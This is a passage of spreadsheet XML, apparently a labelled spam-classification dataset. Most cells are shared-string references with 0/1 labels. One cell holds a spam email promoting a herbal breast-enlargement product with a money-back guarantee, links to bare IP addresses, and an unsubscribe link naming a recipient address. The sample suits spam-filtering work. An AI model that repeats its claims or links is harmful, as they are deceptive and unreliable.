      <c r="A2415" s="1">
        <v>2413.0</v>
      </c>
      <c r="B2415" s="1" t="s">
        <v>3943</v>
      </c>
      <c r="C2415" s="1" t="s">
        <v>3944</v>
      </c>
      <c r="D2415" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2416" hidden="1">
      <c r="A2416" s="1">
        <v>2414.0</v>
      </c>
      <c r="B2416" s="1" t="s">
        <v>3945</v>
      </c>
      <c r="C2416" s="1" t="s">
        <v>3946</v>
      </c>
      <c r="D2416" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2417" hidden="1">
      <c r="A2417" s="1">
        <v>2415.0</v>
      </c>
      <c r="B2417" s="1" t="s">
        <v>3947</v>
      </c>
      <c r="C2417" s="1" t="s">
        <v>3948</v>
      </c>
      <c r="D2417" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2418" hidden="1">
      <c r="A2418" s="1">
        <v>2416.0</v>
      </c>
      <c r="B2418" s="1" t="s">
        <v>1779</v>
      </c>
      <c r="C2418" s="1" t="s">
        <v>1780</v>
      </c>
      <c r="D2418" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" s="1">
        <v>2417.0</v>
      </c>
      <c r="B2419" s="1" t="s">
        <v>3949</v>
      </c>
      <c r="C2419" s="1" t="s">
        <v>3950</v>
      </c>
      <c r="D2419" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" s="1">
        <v>2418.0</v>
      </c>
      <c r="B2420" s="1" t="s">
        <v>3739</v>
      </c>
      <c r="C2420" s="1" t="s">
        <v>1385</v>
      </c>
      <c r="D2420" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2421" hidden="1">
      <c r="A2421" s="1">
        <v>2419.0</v>
      </c>
      <c r="B2421" s="1" t="s">
        <v>3951</v>
      </c>
      <c r="C2421" s="1" t="s">
        <v>3952</v>
      </c>
      <c r="D2421" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2422" hidden="1">
      <c r="A2422" s="1">
        <v>2420.0</v>
      </c>
      <c r="B2422" s="1" t="s">
        <v>3953</v>
      </c>
      <c r="C2422" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="D2422" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2423" hidden="1">
      <c r="A2423" s="1">
        <v>2421.0</v>
      </c>
      <c r="B2423" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="C2423" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="D2423" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2424" hidden="1">
      <c r="A2424" s="1">
        <v>2422.0</v>
      </c>
      <c r="B2424" s="1" t="s">
        <v>3956</v>
      </c>
      <c r="C2424" s="1" t="s">
        <v>3957</v>
      </c>
      <c r="D2424" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" s="1">
        <v>2423.0</v>
      </c>
      <c r="B2425" s="1" t="s">
        <v>571</v>
      </c>
      <c r="C2425" s="1" t="s">
        <v>3958</v>
      </c>
      <c r="D2425" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2426" hidden="1">
      <c r="A2426" s="1">
        <v>2424.0</v>
      </c>
      <c r="B2426" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="C2426" s="1" t="s">
        <v>3959</v>
      </c>
      <c r="D2426" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2427" hidden="1">
      <c r="A2427" s="1">
        <v>2425.0</v>
      </c>
      <c r="B2427" s="1" t="s">
        <v>747</v>
      </c>
      <c r="C2427" s="1" t="s">
        <v>3380</v>
      </c>
      <c r="D2427" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2428" hidden="1">
      <c r="A2428" s="1">
        <v>2426.0</v>
      </c>
      <c r="B2428" s="1" t="s">
        <v>523</v>
      </c>
      <c r="C2428" s="1" t="s">
        <v>524</v>
      </c>
      <c r="D2428" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2429" hidden="1">
      <c r="A2429" s="1">
        <v>2427.0</v>
      </c>
      <c r="B2429" s="1" t="s">
        <v>2848</v>
      </c>
      <c r="C2429" s="1" t="s">
        <v>3960</v>
      </c>
      <c r="D2429" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2430" hidden="1">
      <c r="A2430" s="1">
        <v>2428.0</v>
      </c>
      <c r="B2430" s="1" t="s">
        <v>3311</v>
      </c>
      <c r="C2430" s="1" t="s">
        <v>3961</v>
      </c>
      <c r="D2430" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2431" hidden="1">
      <c r="A2431" s="1">
        <v>2429.0</v>
      </c>
      <c r="B2431" s="1" t="s">
        <v>3962</v>
      </c>
      <c r="C2431" s="1" t="s">
        <v>3963</v>
      </c>
      <c r="D2431" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2432" hidden="1">
      <c r="A2432" s="1">
        <v>2430.0</v>
      </c>
      <c r="B2432" s="1" t="s">
        <v>3964</v>
      </c>
      <c r="C2432" s="1" t="s">
        <v>3965</v>
      </c>
      <c r="D2432" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2433" hidden="1">
      <c r="A2433" s="1">
        <v>2431.0</v>
      </c>
      <c r="B2433" s="1" t="s">
        <v>1133</v>
      </c>
      <c r="C2433" s="1" t="s">
        <v>1134</v>
      </c>
      <c r="D2433" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2434" hidden="1">
      <c r="A2434" s="1">
        <v>2432.0</v>
      </c>
      <c r="B2434" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C2434" s="1" t="s">
        <v>3966</v>
      </c>
      <c r="D2434" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" s="1">
        <v>2433.0</v>
      </c>
      <c r="B2435" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="C2435" s="1" t="s">
        <v>1574</v>
      </c>
      <c r="D2435" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" s="1">
        <v>2434.0</v>
      </c>
      <c r="B2436" s="1" t="s">
        <v>200</v>
      </c>
      <c r="C2436" s="1" t="s">
        <v>201</v>
      </c>
      <c r="D2436" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2437" hidden="1">
      <c r="A2437" s="1">
        <v>2435.0</v>
      </c>
      <c r="B2437" s="1" t="s">
        <v>3169</v>
      </c>
      <c r="C2437" s="1" t="s">
        <v>3170</v>
      </c>
      <c r="D2437" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2438" hidden="1">
      <c r="A2438" s="1">
        <v>2436.0</v>
      </c>
      <c r="B2438" s="1" t="s">
        <v>3967</v>
      </c>
      <c r="C2438" s="1" t="s">
        <v>3968</v>
      </c>
      <c r="D2438" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2439" hidden="1">
      <c r="A2439" s="1">
        <v>2437.0</v>
      </c>
      <c r="B2439" s="1" t="s">
        <v>2571</v>
      </c>
      <c r="C2439" s="1" t="s">
        <v>2572</v>
      </c>
      <c r="D2439" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2440" hidden="1">
      <c r="A2440" s="1">
        <v>2438.0</v>
      </c>
      <c r="B2440" s="1" t="s">
        <v>3969</v>
      </c>
      <c r="C2440" s="1" t="s">
        <v>3970</v>
      </c>
      <c r="D2440" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2441" hidden="1">
      <c r="A2441" s="1">
        <v>2439.0</v>
      </c>
      <c r="B2441" s="1" t="s">
        <v>3971</v>
      </c>
      <c r="C2441" s="1" t="s">
        <v>3972</v>
      </c>
      <c r="D2441" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2442" hidden="1">
      <c r="A2442" s="1">
        <v>2440.0</v>
      </c>
      <c r="B2442" s="1" t="s">
        <v>3973</v>
      </c>
      <c r="C2442" s="1" t="s">
        <v>3974</v>
      </c>
      <c r="D2442" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2443" hidden="1">
      <c r="A2443" s="1">
        <v>2441.0</v>
      </c>
      <c r="B2443" s="1" t="s">
        <v>3975</v>
      </c>
      <c r="C2443" s="1" t="s">
        <v>3976</v>
      </c>
      <c r="D2443" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2444" hidden="1">
      <c r="A2444" s="1">
        <v>2442.0</v>
      </c>
      <c r="B2444" s="1" t="s">
        <v>3977</v>
      </c>
      <c r="C2444" s="1" t="s">
        <v>3978</v>
      </c>
      <c r="D2444" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2445" hidden="1">
      <c r="A2445" s="1">
        <v>2443.0</v>
      </c>
      <c r="B2445" s="1" t="s">
        <v>3979</v>
      </c>
      <c r="C2445" s="1" t="s">
        <v>3980</v>
      </c>
      <c r="D2445" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" s="1">
        <v>2444.0</v>
      </c>
      <c r="B2446" s="1" t="s">
        <v>3981</v>
      </c>
      <c r="C2446" s="1" t="s">
        <v>3982</v>
      </c>
      <c r="D2446" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2447" hidden="1">
      <c r="A2447" s="1">
        <v>2445.0</v>
      </c>
      <c r="B2447" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="C2447" s="1" t="s">
        <v>2203</v>
      </c>
      <c r="D2447" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2448" hidden="1">
      <c r="A2448" s="1">
        <v>2446.0</v>
      </c>
      <c r="B2448" s="1" t="s">
        <v>2430</v>
      </c>
      <c r="C2448" s="1" t="s">
        <v>3983</v>
      </c>
      <c r="D2448" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2449" hidden="1">
      <c r="A2449" s="1">
        <v>2447.0</v>
      </c>
      <c r="B2449" s="1" t="s">
        <v>609</v>
      </c>
      <c r="C2449" s="1" t="s">
        <v>610</v>
      </c>
      <c r="D2449" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2450" hidden="1">
      <c r="A2450" s="1">
        <v>2448.0</v>
      </c>
      <c r="B2450" s="1" t="s">
        <v>3984</v>
      </c>
      <c r="C2450" s="1" t="s">
        <v>3985</v>
      </c>
      <c r="D2450" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" s="1">
        <v>2449.0</v>
      </c>
      <c r="B2451" s="1" t="s">
        <v>895</v>
      </c>
      <c r="C2451" s="1" t="s">
        <v>896</v>
      </c>
      <c r="D2451" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" s="1">
        <v>2450.0</v>
      </c>
      <c r="B2452" s="1" t="s">
        <v>3986</v>
      </c>
      <c r="C2452" s="1" t="s">
        <v>3987</v>
      </c>
      <c r="D2452" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" s="1">
        <v>2451.0</v>
      </c>
      <c r="B2453" s="1" t="s">
        <v>3988</v>
      </c>
      <c r="C2453" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://64.123.160.91:81/li/wangxd/
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=jm@netcom20.netcom.com
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D2453" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" s="1">
        <v>2452.0</v>
      </c>
      <c r="B2454" s="1" t="s">
        <v>3561</v>
      </c>
      <c r="C2454" s="1" t="s">
        <v>3562</v>
      </c>
      <c r="D2454" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2455" hidden="1">
      <c r="A2455" s="1">
        <v>2453.0</v>
      </c>
      <c r="B2455" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C2455" s="1" t="s">
        <v>3989</v>
      </c>
      <c r="D2455" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2456" hidden="1">
      <c r="A2456" s="1">
        <v>2454.0</v>
      </c>
      <c r="B2456" s="1" t="s">
        <v>3990</v>
      </c>
      <c r="C2456" s="1" t="s">
        <v>3991</v>
      </c>
      <c r="D2456" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2457" hidden="1">
      <c r="A2457" s="1">
        <v>2455.0</v>
      </c>
      <c r="B2457" s="1" t="s">
        <v>1064</v>
      </c>
      <c r="C2457" s="1" t="s">
        <v>3992</v>
      </c>
      <c r="D2457" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2458" hidden="1">
      <c r="A2458" s="1">
        <v>2456.0</v>
      </c>
      <c r="B2458" s="1" t="s">
        <v>3993</v>
      </c>
      <c r="C2458" s="1" t="s">
        <v>3994</v>
      </c>
      <c r="D2458" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2459" hidden="1">
      <c r="A2459" s="1">
        <v>2457.0</v>
      </c>
      <c r="B2459" s="1" t="s">
        <v>605</v>
      </c>
      <c r="C2459" s="1" t="s">
        <v>3995</v>
      </c>
      <c r="D2459" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2460" hidden="1">
      <c r="A2460" s="1">
        <v>2458.0</v>
      </c>
      <c r="B2460" s="1" t="s">
        <v>3996</v>
      </c>
      <c r="C2460" s="1" t="s">
        <v>3997</v>
      </c>
      <c r="D2460" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2461" hidden="1">
      <c r="A2461" s="1">
        <v>2459.0</v>
      </c>
      <c r="B2461" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C2461" s="1" t="s">
        <v>3998</v>
      </c>
      <c r="D2461" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" s="1">
        <v>2460.0</v>
      </c>
      <c r="B2462" s="1" t="s">
        <v>3999</v>
      </c>
      <c r="C2462" s="1" t="s">
        <v>4000</v>
      </c>
      <c r="D2462" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" s="1">
        <v>2461.0</v>
      </c>
      <c r="B2463" s="1" t="s">
        <v>4001</v>
      </c>
      <c r="C2463" s="1" t="s">
        <v>4002</v>
      </c>
      <c r="D2463" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2464" hidden="1">
      <c r="A2464" s="1">
        <v>2462.0</v>
      </c>
      <c r="B2464" s="1" t="s">
        <v>2340</v>
      </c>
      <c r="C2464" s="1" t="s">
        <v>2341</v>
      </c>
      <c r="D2464" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2465" hidden="1">
      <c r="A2465" s="1">
        <v>2463.0</v>
      </c>
      <c r="B2465" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C2465" s="1" t="s">
        <v>4003</v>
      </c>
      <c r="D2465" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2466" hidden="1">
      <c r="A2466" s="1">
        <v>2464.0</v>
      </c>
      <c r="B2466" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C2466" s="1" t="s">
        <v>4004</v>
      </c>
      <c r="D2466" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2467" hidden="1">
      <c r="A2467" s="1">
        <v>2465.0</v>
      </c>
      <c r="B2467" s="1" t="s">
        <v>4005</v>
      </c>
      <c r="C2467" s="1" t="s">
        <v>4006</v>
      </c>
      <c r="D2467" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2468" hidden="1">
      <c r="A2468" s="1">
        <v>2466.0</v>
      </c>
      <c r="B2468" s="1" t="s">
        <v>4007</v>
      </c>
      <c r="C2468" s="1" t="s">
        <v>4008</v>
      </c>
      <c r="D2468" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2469" hidden="1">
      <c r="A2469" s="1">
        <v>2467.0</v>
      </c>
      <c r="B2469" s="1" t="s">
        <v>4009</v>
      </c>
      <c r="C2469" s="1" t="s">
        <v>4010</v>
      </c>
      <c r="D2469" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2470" hidden="1">
      <c r="A2470" s="1">
        <v>2468.0</v>
      </c>
      <c r="B2470" s="1" t="s">
        <v>4011</v>
      </c>
      <c r="D2470" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2471" hidden="1">
      <c r="A2471" s="1">
        <v>2469.0</v>
      </c>
      <c r="B2471" s="1" t="s">
        <v>4012</v>
      </c>
      <c r="C2471" s="1" t="s">
        <v>4013</v>
      </c>
      <c r="D2471" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2472" hidden="1">
      <c r="A2472" s="1">
        <v>2470.0</v>
      </c>
      <c r="B2472" s="1" t="s">
        <v>4014</v>
      </c>
      <c r="C2472" s="1" t="s">
        <v>4015</v>
      </c>
      <c r="D2472" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" s="1">
        <v>2471.0</v>
      </c>
      <c r="B2473" s="1" t="s">
        <v>4016</v>
      </c>
      <c r="C2473" s="1" t="s">
        <v>4017</v>
      </c>
      <c r="D2473" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2474" hidden="1">
      <c r="A2474" s="1">
        <v>2472.0</v>
      </c>
      <c r="B2474" s="1" t="s">
        <v>618</v>
      </c>
      <c r="C2474" s="1" t="s">
        <v>4018</v>
      </c>
      <c r="D2474" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2475" hidden="1">
      <c r="A2475" s="1">
        <v>2473.0</v>
      </c>
      <c r="B2475" s="1" t="s">
        <v>4019</v>
      </c>
      <c r="C2475" s="1" t="s">
        <v>4020</v>
      </c>
      <c r="D2475" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2476" hidden="1">
      <c r="A2476" s="1">
        <v>2474.0</v>
      </c>
      <c r="B2476" s="1" t="s">
        <v>4021</v>
      </c>
      <c r="C2476" s="1" t="s">
        <v>4022</v>
      </c>
      <c r="D2476" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" s="1">
        <v>2475.0</v>
      </c>
      <c r="B2477" s="1" t="s">
        <v>4023</v>
      </c>
      <c r="C2477" s="1" t="s">
        <v>4024</v>
      </c>
      <c r="D2477" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2478" hidden="1">
      <c r="A2478" s="1">
        <v>2476.0</v>
      </c>
      <c r="B2478" s="1" t="s">
        <v>4025</v>
      </c>
      <c r="C2478" s="1" t="s">
        <v>4026</v>
      </c>
      <c r="D2478" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2479" hidden="1">
      <c r="A2479" s="1">
        <v>2477.0</v>
      </c>
      <c r="B2479" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C2479" s="1" t="s">
        <v>4027</v>
      </c>
      <c r="D2479" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2480" hidden="1">
      <c r="A2480" s="1">
        <v>2478.0</v>
      </c>
      <c r="B2480" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="C2480" s="1" t="s">
        <v>1117</v>
      </c>
      <c r="D2480" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2481" hidden="1">
      <c r="A2481" s="1">
        <v>2479.0</v>
      </c>
      <c r="B2481" s="1" t="s">
        <v>3996</v>
      </c>
      <c r="C2481" s="1" t="s">
        <v>3997</v>
      </c>
      <c r="D2481" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2482" hidden="1">
      <c r="A2482" s="1">
        <v>2480.0</v>
      </c>
      <c r="B2482" s="1" t="s">
        <v>4028</v>
      </c>
      <c r="C2482" s="1" t="s">
        <v>4029</v>
      </c>
      <c r="D2482" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2483" hidden="1">
      <c r="A2483" s="1">
        <v>2481.0</v>
      </c>
      <c r="B2483" s="1" t="s">
        <v>4030</v>
      </c>
      <c r="C2483" s="1" t="s">
        <v>4031</v>
      </c>
      <c r="D2483" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2484">
      <c r="A2484" s="1">
        <v>2482.0</v>
      </c>
      <c r="B2484" s="1" t="s">
        <v>4032</v>
      </c>
      <c r="C2484" s="1" t="s">
        <v>4033</v>
      </c>
      <c r="D2484" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2485" hidden="1">
      <c r="A2485" s="1">
        <v>2483.0</v>
      </c>
      <c r="B2485" s="1" t="s">
        <v>4034</v>
      </c>
      <c r="C2485" s="1" t="s">
        <v>4035</v>
      </c>
      <c r="D2485" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2486">
      <c r="A2486" s="1">
        <v>2484.0</v>
      </c>
      <c r="B2486" s="1" t="s">
        <v>4036</v>
      </c>
      <c r="C2486" s="1" t="s">
        <v>4037</v>
      </c>
      <c r="D2486" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2487" hidden="1">
      <c r="A2487" s="1">
        <v>2485.0</v>
      </c>
      <c r="B2487" s="1" t="s">
        <v>4038</v>
      </c>
      <c r="C2487" s="1" t="s">
        <v>4039</v>
      </c>
      <c r="D2487" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" s="1">
        <v>2486.0</v>
      </c>
      <c r="B2488" s="1" t="s">
        <v>4040</v>
      </c>
      <c r="C2488" s="1" t="s">
        <v>2281</v>
      </c>
      <c r="D2488" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2489" hidden="1">
      <c r="A2489" s="1">
        <v>2487.0</v>
      </c>
      <c r="B2489" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C2489" s="1" t="s">
        <v>4041</v>
      </c>
      <c r="D2489" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2490" hidden="1">
      <c r="A2490" s="1">
        <v>2488.0</v>
      </c>
      <c r="B2490" s="1" t="s">
        <v>4042</v>
      </c>
      <c r="C2490" s="1" t="s">
        <v>4043</v>
      </c>
      <c r="D2490" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" s="1">
        <v>2489.0</v>
      </c>
      <c r="B2491" s="1" t="s">
        <v>4044</v>
      </c>
      <c r="C2491" s="1" t="s">
        <v>4045</v>
      </c>
      <c r="D2491" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" s="1">
        <v>2490.0</v>
      </c>
      <c r="B2492" s="1" t="s">
        <v>4046</v>
      </c>
      <c r="C2492" s="1" t="s">
        <v>4047</v>
      </c>
      <c r="D2492" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2493" hidden="1">
      <c r="A2493" s="1">
        <v>2491.0</v>
      </c>
      <c r="B2493" s="1" t="s">
        <v>503</v>
      </c>
      <c r="C2493" s="1" t="s">
        <v>4048</v>
      </c>
      <c r="D2493" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2494" hidden="1">
      <c r="A2494" s="1">
        <v>2492.0</v>
      </c>
      <c r="B2494" s="1" t="s">
        <v>470</v>
      </c>
      <c r="C2494" s="1" t="s">
        <v>4049</v>
      </c>
      <c r="D2494" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2495" hidden="1">
      <c r="A2495" s="1">
        <v>2493.0</v>
      </c>
      <c r="B2495" s="1" t="s">
        <v>2816</v>
      </c>
      <c r="C2495" s="1" t="s">
        <v>2817</v>
      </c>
      <c r="D2495" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2496" hidden="1">
      <c r="A2496" s="1">
        <v>2494.0</v>
      </c>
      <c r="B2496" s="1" t="s">
        <v>2219</v>
      </c>
      <c r="C2496" s="1" t="s">
        <v>4050</v>
      </c>
      <c r="D2496" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2497">
      <c r="A2497" s="1">
        <v>2495.0</v>
      </c>
      <c r="B2497" s="1" t="s">
        <v>4051</v>
      </c>
      <c r="C2497" s="1" t="s">
        <v>3791</v>
      </c>
      <c r="D2497" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="2498" hidden="1">
      <c r="A2498" s="1">
        <v>2496.0</v>
      </c>
      <c r="B2498" s="1" t="s">
        <v>2818</v>
      </c>
      <c r="C2498" s="1" t="s">
        <v>2819</v>
      </c>
      <c r="D2498" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2499" hidden="1">
      <c r="A2499" s="1">
        <v>2497.0</v>
      </c>
      <c r="B2499" s="1" t="s">
        <v>4052</v>
      </c>
      <c r="C2499" s="1" t="s">
        <v>4053</v>
      </c>
      <c r="D2499" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2500" hidden="1">
      <c r="A2500" s="1">
        <v>2498.0</v>
      </c>
      <c r="B2500" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C2500" s="1" t="s">
        <v>2702</v>
      </c>
      <c r="D2500" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2501" hidden="1">
      <c r="A2501" s="1">
        <v>2499.0</v>
      </c>
      <c r="B2501" s="1" t="s">
        <v>243</v>
      </c>
      <c r="C2501" s="1" t="s">
        <v>244</v>
      </c>
      <c r="D2501" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2502" hidden="1">
      <c r="A2502" s="1">
        <v>2500.0</v>
      </c>
      <c r="B2502" s="1" t="s">
        <v>614</v>
      </c>
      <c r="C2502" s="1" t="s">
        <v>615</v>
      </c>
      <c r="D2502" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2503" hidden="1">
      <c r="A2503" s="1">
        <v>2501.0</v>
      </c>
      <c r="B2503" s="1" t="s">
        <v>1418</v>
      </c>
      <c r="C2503" s="1" t="s">
        <v>4054</v>
      </c>
      <c r="D2503" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2504" hidden="1">
      <c r="A2504" s="1">
        <v>2502.0</v>
      </c>
      <c r="B2504" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C2504" s="1" t="s">
        <v>4055</v>
      </c>
      <c r="D2504" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2505" hidden="1">
      <c r="A2505" s="1">
        <v>2503.0</v>
      </c>
      <c r="B2505" s="1" t="s">
        <v>4056</v>
      </c>
      <c r="C2505" s="1" t="s">
        <v>4057</v>
      </c>
      <c r="D2505" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2506" hidden="1">
      <c r="A2506" s="1">
        <v>2504.0</v>
      </c>
      <c r="B2506" s="1" t="s">
        <v>4058</v>
      </c>
      <c r="C2506" s="1" t="s">
        <v>4059</v>
      </c>
      <c r="D2506" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2507" hidden="1">
      <c r="A2507" s="1">
        <v>2505.0</v>
      </c>
      <c r="B2507" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="C2507" s="1" t="s">
        <v>3955</v>
      </c>
      <c r="D2507" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2508" hidden="1">
      <c r="A2508" s="1">
        <v>2506.0</v>
      </c>
      <c r="B2508" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C2508" s="1" t="s">
        <v>4060</v>
      </c>
      <c r="D2508" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2509" hidden="1">
      <c r="A2509" s="1">
        <v>2507.0</v>
      </c>
      <c r="B2509" s="1" t="s">
        <v>4061</v>
      </c>
      <c r="C2509" s="1" t="s">
        <v>4062</v>
      </c>
      <c r="D2509" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2510" hidden="1">
      <c r="A2510" s="1">
        <v>2508.0</v>
      </c>
      <c r="B2510" s="1" t="s">
        <v>688</v>
      </c>
      <c r="C2510" s="1" t="s">
        <v>689</v>
      </c>
      <c r="D2510" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2511" hidden="1">
      <c r="A2511" s="1">
        <v>2509.0</v>
      </c>
      <c r="B2511" s="1" t="s">
        <v>4063</v>
      </c>
      <c r="C2511" s="1" t="s">
        <v>4064</v>
      </c>
      <c r="D2511" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2512" hidden="1">
      <c r="A2512" s="1">
        <v>2510.0</v>
      </c>
      <c r="B2512" s="1" t="s">
        <v>4065</v>
      </c>
      <c r="C2512" s="1" t="s">
        <v>4066</v>
      </c>
      <c r="D2512" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2513" hidden="1">
      <c r="A2513" s="1">
        <v>2511.0</v>
      </c>
      <c r="B2513" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C2513" s="1" t="s">
        <v>4067</v>
      </c>
      <c r="D2513" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2514" hidden="1">
      <c r="A2514" s="1">
        <v>2512.0</v>
      </c>
      <c r="B2514" s="1" t="s">
        <v>4068</v>
      </c>
      <c r="C2514" s="1" t="s">
        <v>4069</v>
      </c>
      <c r="D2514" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2515" hidden="1">
      <c r="A2515" s="1">
        <v>2513.0</v>
      </c>
      <c r="B2515" s="1" t="s">
        <v>367</v>
      </c>
      <c r="C2515" s="1" t="s">
        <v>4070</v>
      </c>
      <c r="D2515" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="2516" hidden="1">
      <c r="A2516" s="1">
        <v>2514.0</v>
      </c>
      <c r="B2516" s="1" t="s">
        <v>4071</v>
      </c>
      <c r="C2516" s="1" t="s">
        <v>4072</v>
      </c>
      <c r="D2516" s="1">
        <v>0.0</v>
      </c>
    </row>
